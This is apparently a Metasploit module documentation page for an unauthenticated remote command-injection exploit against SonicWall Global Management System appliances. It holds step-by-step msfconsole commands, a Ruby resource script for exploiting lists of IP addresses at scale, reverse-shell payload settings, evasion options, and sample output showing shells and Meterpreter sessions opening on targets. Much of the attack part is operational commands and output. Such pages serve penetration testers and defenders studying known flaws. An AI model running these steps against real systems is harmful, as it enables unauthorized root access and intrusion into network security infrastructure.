SonicWall Global Management System XMLRPC set_time_zone Unauth RCE - Metasploit


This page contains detailed information about how to use the exploit/unix/sonicwall/sonicwall_xmlrpc_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: SonicWall Global Management System XMLRPC set_time_zone Unauth RCE
Module: exploit/unix/sonicwall/sonicwall_xmlrpc_rce
Source code: modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb
Disclosure date: 2016-07-22
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module exploits a vulnerability in SonicWall Global Management System Virtual Appliance versions 8.1 (Build 8110.1197) and below. This virtual appliance can be downloaded from http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a holistic way to manage your entire network security environment.' These vulnerable versions (8.1 Build 8110.1197 and below) do not prevent unauthenticated, external entities from making XML-RPC requests to port 21009 of the virtual app. After the XML-RPC call is made, a shell script is called like so: 'timeSetup.sh --tz="command injection here"' --usentp="blah"'.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using sonicwall_xmlrpc_rce against a single host

Normally, you can use exploit/unix/sonicwall/sonicwall_xmlrpc_rce this way:

msf > use exploit/unix/sonicwall/sonicwall_xmlrpc_rce
msf exploit(sonicwall_xmlrpc_rce) > show targets
    ... a list of targets ...
msf exploit(sonicwall_xmlrpc_rce) > set TARGET target-id
msf exploit(sonicwall_xmlrpc_rce) > show options
    ... show and set options ...
msf exploit(sonicwall_xmlrpc_rce) > exploit

Using sonicwall_xmlrpc_rce against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your sonicwall_xmlrpc_rce will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/unix/sonicwall/sonicwall_xmlrpc_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


sonicwall_xmlrpc_rce is a remote exploit against SonicWall Global Management System Virtual Appliance and is written by Michael Flanders of Trend Micro Zero Day Initiative with assistance by @kernelsmith of Trend Micro Zero Day Initiative. It is considered a reliable exploit, and allows you to remotely execute commands as root.

  • This exploit works against a vulnerable SonicWall Global Management System Virtual Appliance (A.K.A. Sonicwall GMSVP) of versions 8.1 (Build 8110.1197) and earlier. The virtual appliance can be downloaded here:

    • http://www.sonicwall.com/products/sonicwall-gms/
  • This module exploits the virtual appliance's lack of checking on user-supplied parameters to XML-RPC calls to a vulnerable Java service running on port 21009. A call to a shell script is made using this user-supplied parameter contained in backticks allowing command substitution and remote code execution.

  • To reliably determine whether the target virtual appliance is vulnerable, you will have to examine the web console's login page. This is also automatically done in the check function of the exploit.

Verification Steps


  • [x] Start msfconsole
  • [x] use exploit/unix/sonicwall/sonicwall_xmlrpc_rce
  • [x] set RHOST to the IP address of the vulnerable virtual appliance
  • [x] set RPORT to 21009
  • [x] set payload to the desired payload
  • [x] set any additional options for the payload e.g. LHOST/LPORT
  • [x] exploit
  • [x] Verify that you get a shell
  • [x] Verify that you do not crash

Options


set SSL [true/false]
  • Set this true/false depending on whether the instance of SonicWall GMSVP has been configured to use SSL.
set WEB_SERVER_PORT [port]
  • This is the port of the login page for the web server/virtual appliance. For SonicWall GMVSP this is typically http://[ip]:80; therefore, this option is set by default to 80 (or 443 if set SSL true).

Scenarios


  • This is example output from a normal usage/scenario. This console output is for SonicWall GMSVP version 8.0 (Build 8046.1396):
msf > use exploit/unix/sonicwall/sonicwall_xmlrpc_rce
msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > show options

Module options (exploit/unix/sonicwall/sonicwall_xmlrpc_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                             yes       The target address
   RPORT            80               yes       The target port (TCP)
   SSL              false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                             no        HTTP server virtual host
   WEB_SERVER_PORT                   no        Port of web console login page.
                                             Defaults to 80/443 depending on SSL.


Exploit target:

   Id  Name
   --  ----
   0   SonicWall Global Management System Virtual Appliance


msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set RPORT 21009
RPORT => 21009

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set RHOST 192.168.152.173
RHOST => 192.168.152.173

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set payload cmd/unix/reverse
payload => cmd/unix/reverse

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set LHOST 192.168.152.193
LHOST => 192.168.152.193

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > exploit

[*] Started reverse TCP double handler on 192.168.152.193:4444
[*] The target appears to be vulnerable, continuing exploit...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo H7sn3KYXeuCZy27Q;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "H7sn3KYXeuCZy27Q\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.152.193:4444 -> 192.168.152.173:44698) at 2018-07-05 12:30:56 -0400

Go back to menu.

Msfconsole Usage


Here is how the unix/sonicwall/sonicwall_xmlrpc_rce exploit module looks in the msfconsole:

msf6 > use exploit/unix/sonicwall/sonicwall_xmlrpc_rce

msf6 exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > show info

       Name: SonicWall Global Management System XMLRPC set_time_zone Unauth RCE
     Module: exploit/unix/sonicwall/sonicwall_xmlrpc_rce
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-07-22

Provided by:
  Michael Flanders
  kernelsmith

Available targets:
  Id  Name
  --  ----
  0   SonicWall Global Management System Virtual Appliance

Check supported:
  Yes

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT            80               yes       The target port (TCP)
  SSL              false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                             no        HTTP server virtual host
  WEB_SERVER_PORT                   no        Port of web console login page.
                                             Defaults to 80/443 depending on SSL.

Payload information:
  Avoid: 1 characters

Description:
  This module exploits a vulnerability in SonicWall Global Management 
  System Virtual Appliance versions 8.1 (Build 8110.1197) and below. 
  This virtual appliance can be downloaded from 
  http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a 
  holistic way to manage your entire network security environment.' 
  These vulnerable versions (8.1 Build 8110.1197 and below) do not 
  prevent unauthenticated, external entities from making XML-RPC 
  requests to port 21009 of the virtual app. After the XML-RPC call is 
  made, a shell script is called like so: 'timeSetup.sh --tz="`command 
  injection here`"' --usentp="blah"'.

References:
  https://www.digitaldefense.com/digital-defense/vrt-discoveries/
  https://slides.com/kernelsmith/bsidesaustin2018/#/

Module Options


This is a complete list of options available in the unix/sonicwall/sonicwall_xmlrpc_rce exploit:

msf6 exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > show options

Module options (exploit/unix/sonicwall/sonicwall_xmlrpc_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT            80               yes       The target port (TCP)
   SSL              false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                             no        HTTP server virtual host
   WEB_SERVER_PORT                   no        Port of web console login page.
                                             Defaults to 80/443 depending on SSL.

Exploit target:

   Id  Name
   --  ----
   0   SonicWall Global Management System Virtual Appliance

Advanced Options


Here is a complete list of advanced options supported by the unix/sonicwall/sonicwall_xmlrpc_rce exploit:

msf6 exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > show advanced

Module advanced options (exploit/unix/sonicwall/sonicwall_xmlrpc_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/sonicwall/sonicwall_xmlrpc_rce module can exploit:

msf6 exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   SonicWall Global Management System Virtual Appliance

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/sonicwall/sonicwall_xmlrpc_rce exploit:

msf6 exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > show payloads

Compatible Payloads
===================

   #  Name                                        Disclosure Date  Rank    Check  Description
   -  ----                                        ---------------  ----    -----  -----------
   0  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   1  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   2  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   3  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

Evasion Options


Here is the full list of possible evasion options supported by the unix/sonicwall/sonicwall_xmlrpc_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Connection failed


Here is a relevant code snippet related to the "Connection failed" error message:

66:	    handler = datastore['SSL'] ? 'https' : 'http'
67:	
68:	    res = request_url("#{handler}://#{rhost}:#{port_number}")
69:	
70:	    unless res
71:	      vprint_error 'Connection failed'
72:	      return CheckCode::Unknown
73:	    end
74:	
75:	    unless res.code == 200 && res.body =~ /<TITLE>.+v(\d\.\d)/
76:	      return CheckCode::Safe

The target is not vulnerable.


Here is a relevant code snippet related to the "The target is not vulnerable." error message:

85:	    CheckCode::Appears
86:	  end
87:	
88:	  def exploit
89:	    unless check == CheckCode::Appears
90:	      fail_with Failure::NotVulnerable, "The target is not vulnerable."
91:	    end
92:	
93:	    print_status "The target appears to be vulnerable, continuing exploit..."
94:	    send_xml
95:	  end

Error sending XML to <RHOST>:<RPORT>


Here is a relevant code snippet related to the "Error sending XML to <RHOST>:<RPORT>" error message:

121:	      'uri'     => '/',
122:	      'data'    => xml_body,
123:	      'ctype'   => 'text/xml; charset=UTF-8'
124:	    })
125:	
126:	    unless res && res.body.include?("success")
127:	      print_error("Error sending XML to #{rhost}:#{rport}")
128:	    end
129:	  end
130:	
131:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Michael Flanders
  • kernelsmith

Version


This page has been produced using Metasploit Framework version 6.1.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.